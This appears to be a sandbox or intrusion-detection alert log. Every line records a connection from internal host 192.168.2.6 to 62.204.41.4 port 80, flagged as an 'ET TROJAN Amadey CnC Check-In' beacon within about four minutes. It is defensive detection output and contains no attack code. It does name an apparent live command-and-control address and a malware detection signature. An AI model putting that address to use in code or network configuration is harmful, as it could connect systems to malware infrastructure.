                          192.168.2.662.204.41.450318802027700 02/07/23-20:03:38.985319TCP2027700ET TROJAN Amadey CnC Check-In5031880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450088802027700 02/07/23-20:02:36.767849TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450284802027700 02/07/23-20:03:30.624651TCP2027700ET TROJAN Amadey CnC Check-In5028480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449763802027700 02/07/23-20:01:01.550107TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449791802027700 02/07/23-20:01:10.547144TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450030802027700 02/07/23-20:02:18.384404TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450382802027700 02/07/23-20:03:54.707955TCP2027700ET TROJAN Amadey CnC Check-In5038280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450480802027700 02/07/23-20:04:18.662379TCP2027700ET TROJAN Amadey CnC Check-In5048080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449800802027700 02/07/23-20:01:12.702989TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449956802027700 02/07/23-20:01:56.737292TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450416802027700 02/07/23-20:04:03.085073TCP2027700ET TROJAN Amadey CnC Check-In5041680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450125802027700 02/07/23-20:02:46.439463TCP2027700ET TROJAN Amadey CnC Check-In5012580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450379802027700 02/07/23-20:03:53.987905TCP2027700ET TROJAN Amadey CnC Check-In5037980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450477802027700 02/07/23-20:04:17.942956TCP2027700ET TROJAN Amadey CnC Check-In5047780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450027802027700 02/07/23-20:02:17.657151TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450223802027700 02/07/23-20:03:13.167790TCP2027700ET TROJAN Amadey CnC Check-In5022380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450321802027700 02/07/23-20:03:39.741323TCP2027700ET TROJAN Amadey CnC Check-In5032180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450256802027700 02/07/23-20:03:21.219153TCP2027700ET TROJAN Amadey CnC Check-In5025680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449796802027700 02/07/23-20:01:11.751019TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449951802027700 02/07/23-20:01:55.550313TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450002802027700 02/07/23-20:02:11.408990TCP2027700ET TROJAN Amadey CnC Check-In5000280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450411802027700 02/07/23-20:04:01.821830TCP2027700ET TROJAN Amadey CnC Check-In5041180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449928802027700 02/07/23-20:01:49.894595TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450120802027700 02/07/23-20:02:44.901958TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450161802027700 02/07/23-20:02:58.254042TCP2027700ET TROJAN Amadey CnC Check-In5016180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450374802027700 02/07/23-20:03:52.768199TCP2027700ET TROJAN Amadey CnC Check-In5037480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450469802027700 02/07/23-20:04:16.004547TCP2027700ET TROJAN Amadey CnC Check-In5046980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450215802027700 02/07/23-20:03:11.200842TCP2027700ET TROJAN Amadey CnC Check-In5021580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450452802027700 02/07/23-20:04:11.861795TCP2027700ET TROJAN Amadey CnC Check-In5045280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449833802027700 02/07/23-20:01:20.483013TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450019802027700 02/07/23-20:02:15.689584TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449727802027700 02/07/23-20:00:53.058922TCP2027700ET TROJAN Amadey CnC Check-In4972780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450055802027700 02/07/23-20:02:24.503969TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449886802027700 02/07/23-20:01:35.832637TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450091802027700 02/07/23-20:02:37.622394TCP2027700ET TROJAN Amadey CnC Check-In5009180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450346802027700 02/07/23-20:03:45.861770TCP2027700ET TROJAN Amadey CnC Check-In5034680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449768802027700 02/07/23-20:01:02.811173TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450096802027700 02/07/23-20:02:38.862015TCP2027700ET TROJAN Amadey CnC Check-In5009680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449964802027700 02/07/23-20:01:58.773796TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450251802027700 02/07/23-20:03:20.007203TCP2027700ET TROJAN Amadey CnC Check-In5025180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449923802027700 02/07/23-20:01:46.547163TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450292802027700 02/07/23-20:03:32.559192TCP2027700ET TROJAN Amadey CnC Check-In5029280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449881802027700 02/07/23-20:01:34.599060TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449878802027700 02/07/23-20:01:34.080304TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449976802027700 02/07/23-20:02:01.442060TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449722802027700 02/07/23-20:00:51.810569TCP2027700ET TROJAN Amadey CnC Check-In4972280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449771802027700 02/07/23-20:01:03.532617TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449915802027700 02/07/23-20:01:43.056279TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450050802027700 02/07/23-20:02:23.248250TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450133802027700 02/07/23-20:02:51.437305TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450387802027700 02/07/23-20:03:55.955538TCP2027700ET TROJAN Amadey CnC Check-In5038780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449805802027700 02/07/23-20:01:13.918183TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450341802027700 02/07/23-20:03:44.643209TCP2027700ET TROJAN Amadey CnC Check-In5034180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450326802027700 02/07/23-20:03:40.953159TCP2027700ET TROJAN Amadey CnC Check-In5032680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450424802027700 02/07/23-20:04:05.016891TCP2027700ET TROJAN Amadey CnC Check-In5042480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450243802027700 02/07/23-20:03:17.999930TCP2027700ET TROJAN Amadey CnC Check-In5024380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450105802027700 02/07/23-20:02:41.198188TCP2027700ET TROJAN Amadey CnC Check-In5010580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450071802027700 02/07/23-20:02:32.235512TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450007802027700 02/07/23-20:02:12.669391TCP2027700ET TROJAN Amadey CnC Check-In5000780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450359802027700 02/07/23-20:03:49.032956TCP2027700ET TROJAN Amadey CnC Check-In5035980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449743802027700 02/07/23-20:00:56.902351TCP2027700ET TROJAN Amadey CnC Check-In4974380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449841802027700 02/07/23-20:01:22.423646TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449997802027700 02/07/23-20:02:10.169392TCP2027700ET TROJAN Amadey CnC Check-In4999780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450178802027700 02/07/23-20:03:02.400607TCP2027700ET TROJAN Amadey CnC Check-In5017880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450362802027700 02/07/23-20:03:49.798075TCP2027700ET TROJAN Amadey CnC Check-In5036280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449992802027700 02/07/23-20:02:06.575939TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450068802027700 02/07/23-20:02:31.452026TCP2027700ET TROJAN Amadey CnC Check-In5006880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450460802027700 02/07/23-20:04:13.772290TCP2027700ET TROJAN Amadey CnC Check-In5046080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449989802027700 02/07/23-20:02:05.120374TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449735802027700 02/07/23-20:00:54.983578TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450354802027700 02/07/23-20:03:47.847893TCP2027700ET TROJAN Amadey CnC Check-In5035480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450022802027700 02/07/23-20:02:16.443010TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450063802027700 02/07/23-20:02:28.396717TCP2027700ET TROJAN Amadey CnC Check-In5006380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450276802027700 02/07/23-20:03:28.648274TCP2027700ET TROJAN Amadey CnC Check-In5027680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449948802027700 02/07/23-20:01:54.830001TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450141802027700 02/07/23-20:02:53.400943TCP2027700ET TROJAN Amadey CnC Check-In5014180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450395802027700 02/07/23-20:03:57.910152TCP2027700ET TROJAN Amadey CnC Check-In5039580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450100802027700 02/07/23-20:02:39.901405TCP2027700ET TROJAN Amadey CnC Check-In5010080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450313802027700 02/07/23-20:03:37.774355TCP2027700ET TROJAN Amadey CnC Check-In5031380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450271802027700 02/07/23-20:03:27.422593TCP2027700ET TROJAN Amadey CnC Check-In5027180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449984802027700 02/07/23-20:02:03.441087TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449943802027700 02/07/23-20:01:53.532965TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449730802027700 02/07/23-20:00:53.793502TCP2027700ET TROJAN Amadey CnC Check-In4973080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450289802027700 02/07/23-20:03:31.813234TCP2027700ET TROJAN Amadey CnC Check-In5028980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450035802027700 02/07/23-20:02:19.615798TCP2027700ET TROJAN Amadey CnC Check-In5003580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450248802027700 02/07/23-20:03:19.236086TCP2027700ET TROJAN Amadey CnC Check-In5024880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450207802027700 02/07/23-20:03:09.251394TCP2027700ET TROJAN Amadey CnC Check-In5020780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450432802027700 02/07/23-20:04:06.987943TCP2027700ET TROJAN Amadey CnC Check-In5043280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450390802027700 02/07/23-20:03:56.676042TCP2027700ET TROJAN Amadey CnC Check-In5039080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450174802027700 02/07/23-20:03:01.410759TCP2027700ET TROJAN Amadey CnC Check-In5017480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450367802027700 02/07/23-20:03:51.006859TCP2027700ET TROJAN Amadey CnC Check-In5036780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449748802027700 02/07/23-20:00:58.128864TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450015802027700 02/07/23-20:02:14.676485TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450113802027700 02/07/23-20:02:43.134587TCP2027700ET TROJAN Amadey CnC Check-In5011380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450269802027700 02/07/23-20:03:26.932435TCP2027700ET TROJAN Amadey CnC Check-In5026980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450263802027700 02/07/23-20:03:25.380080TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450272802027700 02/07/23-20:03:27.657286TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450370802027700 02/07/23-20:03:51.805979TCP2027700ET TROJAN Amadey CnC Check-In5037080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450361802027700 02/07/23-20:03:49.565590TCP2027700ET TROJAN Amadey CnC Check-In5036180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449739802027700 02/07/23-20:00:55.935980TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450006802027700 02/07/23-20:02:12.401268TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450358802027700 02/07/23-20:03:48.800828TCP2027700ET TROJAN Amadey CnC Check-In5035880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449837802027700 02/07/23-20:01:21.459260TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450202802027700 02/07/23-20:03:08.029585TCP2027700ET TROJAN Amadey CnC Check-In5020280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450456802027700 02/07/23-20:04:12.818077TCP2027700ET TROJAN Amadey CnC Check-In5045680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450104802027700 02/07/23-20:02:40.952138TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449809802027700 02/07/23-20:01:14.874634TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450333802027700 02/07/23-20:03:42.674478TCP2027700ET TROJAN Amadey CnC Check-In5033380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450235802027700 02/07/23-20:03:16.065619TCP2027700ET TROJAN Amadey CnC Check-In5023580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450431802027700 02/07/23-20:04:06.742108TCP2027700ET TROJAN Amadey CnC Check-In5043180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449910802027700 02/07/23-20:01:41.844449TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449977802027700 02/07/23-20:02:01.710756TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449723802027700 02/07/23-20:00:52.073819TCP2027700ET TROJAN Amadey CnC Check-In4972380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449879802027700 02/07/23-20:01:34.335804TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449821802027700 02/07/23-20:01:17.548025TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449812802027700 02/07/23-20:01:15.578134TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449968802027700 02/07/23-20:01:59.735492TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449770802027700 02/07/23-20:01:03.285971TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449767802027700 02/07/23-20:01:02.575091TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449882802027700 02/07/23-20:01:34.875626TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450440802027700 02/07/23-20:04:08.934141TCP2027700ET TROJAN Amadey CnC Check-In5044080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450291802027700 02/07/23-20:03:32.300203TCP2027700ET TROJAN Amadey CnC Check-In5029180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449971802027700 02/07/23-20:02:00.459434TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450244802027700 02/07/23-20:03:18.251405TCP2027700ET TROJAN Amadey CnC Check-In5024480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450429802027700 02/07/23-20:04:06.205613TCP2027700ET TROJAN Amadey CnC Check-In5042980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450339802027700 02/07/23-20:03:44.150750TCP2027700ET TROJAN Amadey CnC Check-In5033980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450043802027700 02/07/23-20:02:21.535774TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450297802027700 02/07/23-20:03:33.829768TCP2027700ET TROJAN Amadey CnC Check-In5029780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450132802027700 02/07/23-20:02:51.157888TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450173802027700 02/07/23-20:03:01.155358TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450386802027700 02/07/23-20:03:55.723368TCP2027700ET TROJAN Amadey CnC Check-In5038680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450216802027700 02/07/23-20:03:11.470014TCP2027700ET TROJAN Amadey CnC Check-In5021680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450428802027700 02/07/23-20:04:05.975695TCP2027700ET TROJAN Amadey CnC Check-In5042880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450084802027700 02/07/23-20:02:35.626446TCP2027700ET TROJAN Amadey CnC Check-In5008480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449952802027700 02/07/23-20:01:55.791186TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450412802027700 02/07/23-20:04:02.064925TCP2027700ET TROJAN Amadey CnC Check-In5041280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449911802027700 02/07/23-20:01:42.093950TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450305802027700 02/07/23-20:03:35.785500TCP2027700ET TROJAN Amadey CnC Check-In5030580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449751802027700 02/07/23-20:00:58.872163TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449840802027700 02/07/23-20:01:22.187785TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449898802027700 02/07/23-20:01:38.811965TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450399802027700 02/07/23-20:03:58.878195TCP2027700ET TROJAN Amadey CnC Check-In5039980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450047802027700 02/07/23-20:02:22.518279TCP2027700ET TROJAN Amadey CnC Check-In5004780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450145802027700 02/07/23-20:02:54.357855TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450231802027700 02/07/23-20:03:15.107613TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450056802027700 02/07/23-20:02:24.870217TCP2027700ET TROJAN Amadey CnC Check-In5005680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450228802027700 02/07/23-20:03:14.349981TCP2027700ET TROJAN Amadey CnC Check-In5022880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450062802027700 02/07/23-20:02:28.090658TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450317802027700 02/07/23-20:03:38.748560TCP2027700ET TROJAN Amadey CnC Check-In5031780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450219802027700 02/07/23-20:03:12.179097TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449838802027700 02/07/23-20:01:21.703798TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450457802027700 02/07/23-20:04:13.065112TCP2027700ET TROJAN Amadey CnC Check-In5045780192.168.2.662.204.41.4
                          192.168.2.662.204.41.449936802027700 02/07/23-20:01:51.820246TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450301802027700 02/07/23-20:03:34.801016TCP2027700ET TROJAN Amadey CnC Check-In5030180192.168.2.662.204.41.4
                          192.168.2.662.204.41.450203802027700 02/07/23-20:03:08.264782TCP2027700ET TROJAN Amadey CnC Check-In5020380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449853802027700 02/07/23-20:01:25.706873TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449894802027700 02/07/23-20:01:37.843818TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449755802027700 02/07/23-20:00:59.855021TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449927802027700 02/07/23-20:01:49.659609TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450288802027700 02/07/23-20:03:31.578001TCP2027700ET TROJAN Amadey CnC Check-In5028880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450158802027700 02/07/23-20:02:57.529246TCP2027700ET TROJAN Amadey CnC Check-In5015880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450383802027700 02/07/23-20:03:54.971539TCP2027700ET TROJAN Amadey CnC Check-In5038380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449764802027700 02/07/23-20:01:01.795053TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450028802027700 02/07/23-20:02:17.895696TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450342802027700 02/07/23-20:03:44.892172TCP2027700ET TROJAN Amadey CnC Check-In5034280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449980802027700 02/07/23-20:02:02.464633TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.662.204.41.4
                          192.168.2.662.204.41.450472802027700 02/07/23-20:04:16.721903TCP2027700ET TROJAN Amadey CnC Check-In5047280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450075802027700 02/07/23-20:02:33.175281TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450117802027700 02/07/23-20:02:44.156964TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450199802027700 02/07/23-20:03:07.326755TCP2027700ET TROJAN Amadey CnC Check-In5019980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450034802027700 02/07/23-20:02:19.362339TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450247802027700 02/07/23-20:03:18.979917TCP2027700ET TROJAN Amadey CnC Check-In5024780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450314802027700 02/07/23-20:03:38.017064TCP2027700ET TROJAN Amadey CnC Check-In5031480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449949802027700 02/07/23-20:01:55.074452TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450444802027700 02/07/23-20:04:09.894977TCP2027700ET TROJAN Amadey CnC Check-In5044480192.168.2.662.204.41.4
                          192.168.2.662.204.41.450403802027700 02/07/23-20:03:59.851322TCP2027700ET TROJAN Amadey CnC Check-In5040380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449908802027700 02/07/23-20:01:41.349767TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.662.204.41.4
                          192.168.2.662.204.41.449866802027700 02/07/23-20:01:31.109835TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.662.204.41.4
                          192.168.2.662.204.41.450320802027700 02/07/23-20:03:39.480009TCP2027700ET TROJAN Amadey CnC Check-In5032080192.168.2.662.204.41.4
                          192.168.2.662.204.41.449736802027700 02/07/23-20:00:55.230834TCP2027700ET TROJAN Amadey CnC Check-In4973680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449783802027700 02/07/23-20:01:06.638994TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449996802027700 02/07/23-20:02:09.912452TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.662.204.41.4
                          192.168.2.662.204.41.449825802027700 02/07/23-20:01:18.559732TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449742802027700 02/07/23-20:00:56.667263TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.662.204.41.4
                          192.168.2.662.204.41.449955802027700 02/07/23-20:01:56.500323TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450018802027700 02/07/23-20:02:15.452445TCP2027700ET TROJAN Amadey CnC Check-In5001880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450309802027700 02/07/23-20:03:36.772736TCP2027700ET TROJAN Amadey CnC Check-In5030980192.168.2.662.204.41.4
                          192.168.2.662.204.41.449947802027700 02/07/23-20:01:54.584701TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450082802027700 02/07/23-20:02:34.890335TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450214802027700 02/07/23-20:03:10.972258TCP2027700ET TROJAN Amadey CnC Check-In5021480192.168.2.662.204.41.4
                          192.168.2.662.204.41.449993802027700 02/07/23-20:02:07.121549TCP2027700ET TROJAN Amadey CnC Check-In4999380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450355802027700 02/07/23-20:03:48.094654TCP2027700ET TROJAN Amadey CnC Check-In5035580192.168.2.662.204.41.4
                          192.168.2.662.204.41.450471802027700 02/07/23-20:04:16.488079TCP2027700ET TROJAN Amadey CnC Check-In5047180192.168.2.662.204.41.4
                          192.168.2.662.204.41.449852802027700 02/07/23-20:01:25.383304TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.662.204.41.4
                          192.168.2.662.204.41.450003802027700 02/07/23-20:02:11.648732TCP2027700ET TROJAN Amadey CnC Check-In5000380192.168.2.662.204.41.4
                          192.168.2.662.204.41.450453802027700 02/07/23-20:04:12.107650TCP2027700ET TROJAN Amadey CnC Check-In5045380192.168.2.662.204.41.4
                          192.168.2.662.204.41.449929802027700 02/07/23-20:01:50.134882TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.662.204.41.4
                          192.168.2.662.204.41.450177802027700 02/07/23-20:03:02.166311TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.662.204.41.4
                          192.168.2.662.204.41.450275802027700 02/07/23-20:03:28.403496TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.662.204.41.4
                          192.168.2.662.204.41.449965802027700 02/07/23-20:01:59.016140TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.662.204.41.4
